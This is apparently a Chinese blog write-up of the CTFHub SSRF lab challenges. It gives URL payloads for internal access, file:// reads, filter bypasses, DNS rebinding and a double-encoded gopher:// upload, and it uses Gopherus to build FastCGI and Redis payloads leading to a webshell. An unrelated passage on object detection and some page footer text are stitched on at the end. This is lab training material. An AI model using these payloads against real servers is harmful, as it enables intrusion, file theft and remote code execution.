CTFhub-WEB-SSRF

CTFHub

一、内网访问

尝试访问位于127.0.0.1的flag.php吧

/?url=http://127.0.0.1/flag.php

二、伪协议读取文件

尝试去读取一下Web目录下的flag.php

/?url=file:///var/www/html/flag.php

查看源代码

三、端口扫描

来试试CTFHub在线扫端口,据说端口范围是8000-9000

 /?url=127.0.0.1:8000

第一步 对输入的页面进行抓包

第二步进行暴力破解

四、URL Bypass

请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限 制吧 原则@绕过

/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

五、数字IP Bypass

输入http://127.0.0.1/flag.php

ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1

绕过

127.0.0.1–>localhost
127.0.0.1–>7F000001 十六进制
127.0.0.1–>2130706433 十进制
127.0.0.1–>2130706433 Enclosed Alphanumerics
/?url=www.imuhan.com/flag.php

六、302跳转 Bypass

文件读取一下试试

?url=file:///var/www/html/index.php

输入http://127.0.0.1/flag.php

发现禁用ip127.0.0.1

饶过

?url=http://0.0.0.0/flag.php
?url=http://localhost/flag.php

七、DNS重绑定 Bypass

输入http://127.0.0.1/flag.php

rbndr.us dns rebinding service

打开此网站,获取内网IP的域名并访问

并将第二个修改为127.0.0.2

网址输入

?url=http://7f000001.7f000002.rbndr.us/flag.php

八、POST

访问flag.php

查看源代码

将key输入到框内

回车抓包

删除多余部分留下host,type,lengthhost 改为127.0.0.1:80

复制代码进行二次编码,第一次编码后将%0A转换为%0D%0A结尾加%0D%0A

输入到框内访问

九、上传文件

通过 file:// 伪协议来读取 flag.php 源代码

/?url=file:///var/www/html/flag.php

检查源代码

源代码添加

<input type="submit" name="submit"

得到提交

提交抓包

和上一题一直进行编码

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Length%253A%2520292%250D%250AContent-Type%253A%2520multipart/form-data%253B%2520boundary%253D----WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250A%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%2522test.txt%2522%250D%250AContent-Type%253A%2520text/plain%250D%250A%250D%250ASSRF%2520Upload%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25E6%258F%2590%25E4%25BA%25A4%250D%250A------WebKitFormBoundary1lYApMMA3NDrr2iY--

十、FastCGI协议

打开kali

使用Gopherus工具生成payload

python2 gopherus.py --exploit fastcgi

将生成的gopher进行url编码在次访问页面获得falg

在Kili里再次执行

输入到搜素框后出现

十一、Redis协议

步骤一:和第十题同理 Gopherus 并生成攻击载荷...

python2 gopherus.py --exploit redis

进行编码

输入到框内

打开蚁剑把目标栏地址输入密码为一句话密码

  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
目标检测(Object Detection)是计算机视觉领域的一个核心问题,其主要任务是找出图像中所有感兴趣的目标(物体),并确定它们的类别和位置。以下是对目标检测的详细阐述: 一、基本概念 目标检测的任务是解决“在哪里?是什么?”的问题,即定位出图像中目标的位置并识别出目标的类别。由于各类物体具有不同的外观、形状和姿态,加上成像时光照、遮挡等因素的干扰,目标检测一直是计算机视觉领域最具挑战性的任务之一。 二、核心问题 目标检测涉及以下几个核心问题: 分类问题:判断图像中的目标属于哪个类别。 定位问题:确定目标在图像中的具体位置。 大小问题:目标可能具有不同的大小。 形状问题:目标可能具有不同的形状。 三、算法分类 基于深度学习的目标检测算法主要分为两大类: Two-stage算法:先进行区域生成(Region Proposal),生成有可能包含待检物体的预选框(Region Proposal),再通过卷积神经网络进行样本分类。常见的Two-stage算法包括R-CNN、Fast R-CNN、Faster R-CNN等。 One-stage算法:不用生成区域提议,直接在网络中提取特征来预测物体分类和位置。常见的One-stage算法包括YOLO系列(YOLOv1、YOLOv2、YOLOv3、YOLOv4、YOLOv5等)、SSD和RetinaNet等。 四、算法原理 以YOLO系列为例,YOLO将目标检测视为回归问题,将输入图像一次性划分为多个区域,直接在输出层预测边界框和类别概率。YOLO采用卷积网络来提取特征,使用全连接层来得到预测值。其网络结构通常包含多个卷积层和全连接层,通过卷积层提取图像特征,通过全连接层输出预测结果。 五、应用领域 目标检测技术已经广泛应用于各个领域,为人们的生活带来了极大的便利。以下是一些主要的应用领域: 安全监控:在商场、银行
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值